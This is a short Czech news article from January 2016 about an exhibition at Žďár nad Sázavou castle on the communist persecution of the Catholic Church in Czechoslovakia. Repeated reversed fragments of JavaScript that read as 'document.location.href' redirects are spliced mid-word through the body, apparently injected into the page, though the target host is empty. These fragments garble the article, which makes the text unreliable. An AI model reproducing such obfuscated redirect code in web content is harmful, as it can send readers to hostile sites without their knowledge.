Rainbow page separator

Výstava ve žďárském zámku mapuje pronásledování církve

Neděle, 31. ledna 2016

Výstava Diktatura versus nadějě

Žďár nad Sázavou / Ve žďárském zámku ve spolupráci s Ústavem pro studium [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];totalitních režimů a archivem kanceláře prezidenta republiky představí návštěvníkům výstavu nazvanou Diktatura versus naděje. Ta mapuje pronásledování římskoka[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tolické církve v Československu v letech 1948–1989. Výstava bude přístupna veřejnosti od 1. února do 15. března v pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torách Muzea nové generace.
Výstava je součástí dlouhodobého projektu, jehož první část týkající se 50. let byla veřejnosti představena na podzim roku 2009 v pražském Strahovském klášteře, poté pu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovala po českých a moravských diecézích. V letech 2011–2012 rozšířil au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torský tým její časový záběr o léta šedesátá až osmdesátá.
„Jsme rádi, že můžeme návštěvníkům zámku představit další ze série úspěšných a poučných výstav, které mapují významné aspekty české his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torie. Je důležité pochopit svou minulost, abychom mohli úspěšně vytvářet svou budoucnost,“ uvedl majitel žďárského zámku Constantin Kinský.

Výstava Diktatura versus nadějě